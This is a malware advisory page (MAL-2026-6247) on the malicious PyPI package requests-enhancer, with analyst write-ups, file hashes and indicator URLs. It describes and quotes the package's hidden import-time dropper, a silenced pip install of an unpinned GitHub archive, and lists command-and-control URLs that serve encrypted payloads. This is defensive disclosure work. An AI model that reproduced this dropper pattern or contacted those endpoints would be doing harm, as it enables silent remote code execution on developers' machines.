Vulnerability-Lookup

MAL-2026-6247

Vulnerability from ossf_malicious_packages

Published

2026-06-20 23:24

Modified

2026-06-23 16:56

Summary

Malicious code in requests-enhancer (PyPI)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (a0f61f1a905e0ec1bb593f7b20d4f9a8a9e72deeb16440f72acbcaf00aeab1cd)

On import requests_enhancer, the package's __init__.py spawns a daemon thread that runs pip install https://github.com/Hexa-devy/netflow-utils/archive/refs/heads/master.zip via subprocess.run([sys.executable, '-m', 'pip', 'install',...]). The target is a mutable master-branch archive with no commit SHA, version, or hash pin; pip will execute the referenced repo's setup.py / build backend as part of installation, giving whoever controls that branch arbitrary code execution on every installer's machine each time the package is imported. The behavior is undeclared in pyproject.toml and undocumented in the README. The subprocess output is redirected to DEVNULL, exceptions are swallowed by a bare except Exception: pass, and the work is done on a daemon thread so the import returns immediately — making the fetch-and-execute invisible to the user and to synchronous import-time auditing. This is a textbook dropper: post-publish attacker-mutable code execution at import time, with deliberate silencing of evidence.

Source: kam193 (950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62)

Malicious package with a chain of multiple manual dependencies to finally download malicious code. During import, it manually downloads a dependency from GitHub repository "Hexa-devy/netflow-utils", which then attempts to download "codexio-boop/platform_syslib". The last one contains obfuscated code that during installation connects with node22.lunes[.]host:3258 and downloads encrypted payload. The payload is executed, and it then starts another loop of connections to node22.lunes[.]host:22240 and awaits next payloads to execute. During analysis, this stage did not deliver any payload. On every stage, short-living generated tokens are used.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-requests-enhancer

Reasons (based on the campaign):

backdoor
The package overrides the install command in setup.py to execute malicious code during installation.
obfuscation
The malicious code is intentionally included in a dependency of the package
The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.

CWE

CWE-506 - The product contains code that appears to be malicious in nature.

Credits

Amazon Inspector inspector-research@amazon.com

Kamil Mańkowski (kam193) github.com/kam193 bad-packages.kam193.eu/

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "requests_enhancer/__init__.py",
              "sha256": "fa1dee5f2f9b803d0303197b4168dd45b00fbd973ebd89bf671fec6a8b908219",
              "tlsh": "f421113ad4241473c185c2d3182496131ff7651bbb0258bc70ee5b640fee4a68660176"
            }
          ],
          "package_integrity": [
            {
              "filename": "requests_enhancer-1.4.2-py3-none-any.whl",
              "hashes": {
                "blake2b_256": "41e14d1267695ec2105fee0869e13ee1e537f3113fd3f834b9ed4639764cdf0e",
                "md5": "10659dd20eaf203ccee3624e4e37dfdd",
                "sha256": "995ee49151cc2c2ef32531983153c8d2e4c57dbfe4bab6944b34241cbe92b63b"
              }
            },
            {
              "filename": "requests_enhancer-1.4.2.tar.gz",
              "hashes": {
                "blake2b_256": "53ea78c6840bf6b51be09fdd5362875143cf265f9f4217ede18164348e19f167",
                "md5": "d4af8b5f972846d0dcbe046e06c1d267",
                "sha256": "1102476ec36f1e69f6b656d1bb8d23e617cc7d4a4cad4a3748e12f06dd407635"
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "requests-enhancer"
      },
      "versions": [
        "1.4.2"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    },
    {
      "contact": [
        "https://github.com/kam193",
        "https://bad-packages.kam193.eu/"
      ],
      "name": "Kamil Ma\u0144kowski (kam193)",
      "type": "REPORTER"
    }
  ],
  "database_specific": {
    "iocs": {
      "urls": [
        "https://github.com/codexio-boop/platform_syslib/archive/refs/heads/master.zip",
        "https://github.com/Hexa-devy/netflow-utils/archive/refs/heads/master.zip",
        "http://node22.lunes.host:3258/sync?v=",
        "http://node22.lunes.host:3258/go?n=",
        "http://node22.lunes.host:22240/update?v="
      ]
    },
    "malicious-packages-origins": [
      {
        "id": "pypi/2026-06-requests-enhancer/requests-enhancer",
        "import_time": "2026-06-20T23:31:19.136908039Z",
        "modified_time": "2026-06-20T23:24:02.247136Z",
        "sha256": "950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62",
        "source": "kam193",
        "versions": [
          "1.4.2"
        ]
      },
      {
        "id": "IN-MAL-2026-007273",
        "import_time": "2026-06-23T16:54:13.69981833Z",
        "modified_time": "2026-06-23T16:11:35Z",
        "sha256": "a0f61f1a905e0ec1bb593f7b20d4f9a8a9e72deeb16440f72acbcaf00aeab1cd",
        "source": "amazon-inspector",
        "versions": [
          "1.4.2"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (a0f61f1a905e0ec1bb593f7b20d4f9a8a9e72deeb16440f72acbcaf00aeab1cd)\nOn `import requests_enhancer`, the package\u0027s `__init__.py` spawns a daemon thread that runs `pip install https://github.com/Hexa-devy/netflow-utils/archive/refs/heads/master.zip` via `subprocess.run([sys.executable, \u0027-m\u0027, \u0027pip\u0027, \u0027install\u0027,...])`. The target is a mutable `master`-branch archive with no commit SHA, version, or hash pin; pip will execute the referenced repo\u0027s setup.py / build backend as part of installation, giving whoever controls that branch arbitrary code execution on every installer\u0027s machine each time the package is imported. The behavior is undeclared in pyproject.toml and undocumented in the README. The subprocess output is redirected to DEVNULL, exceptions are swallowed by a bare `except Exception: pass`, and the work is done on a daemon thread so the import returns immediately \u2014 making the fetch-and-execute invisible to the user and to synchronous import-time auditing. This is a textbook dropper: post-publish attacker-mutable code execution at import time, with deliberate silencing of evidence.\n\n## Source: kam193 (950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62)\nMalicious package with a chain of multiple manual dependencies to finally download malicious code. During import, it manually downloads a dependency from GitHub repository \"Hexa-devy/netflow-utils\", which then attempts to download \"codexio-boop/platform_syslib\". The last one contains obfuscated code that during installation connects with node22.lunes[.]host:3258 and downloads encrypted payload. The payload is executed, and it then starts another loop of connections to node22.lunes[.]host:22240 and awaits next payloads to execute. During analysis, this stage did not deliver any payload. On every stage, short-living generated tokens are used.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-requests-enhancer\n\n\nReasons (based on the campaign):\n\n\n - backdoor\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n\n\n - obfuscation\n\n\n - The malicious code is intentionally included in a dependency of the package\n\n\n - The package contains code to execute remote commands (probably limited to a specific set) on the victim\u0027s machine.\n",
  "id": "MAL-2026-6247",
  "modified": "2026-06-23T16:56:10Z",
  "published": "2026-06-20T23:24:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Hexa-devy/netflow-utils/blob/4f33b53019b11b99889ec860d486d550701f6e9d/pyproject.toml#L35"
    },
    {
      "type": "WEB",
      "url": "https://github.com/codexio-boop/platform_syslib/blob/236340da65e23865eb1a9a6e4ed94d163ae80452/setup.py"
    },
    {
      "type": "WEB",
      "url": "https://github.com/codexio-boop/platform_syslib/blob/236340da65e23865eb1a9a6e4ed94d163ae80452/connkit/__init__.py"
    },
    {
      "type": "WEB",
      "url": "https://bad-packages.kam193.eu/pypi/package/requests-enhancer"
    },
    {
      "type": "PACKAGE",
      "url": "https://pypi.org/project/requests-enhancer/1.4.2/"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in requests-enhancer (PyPI)"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted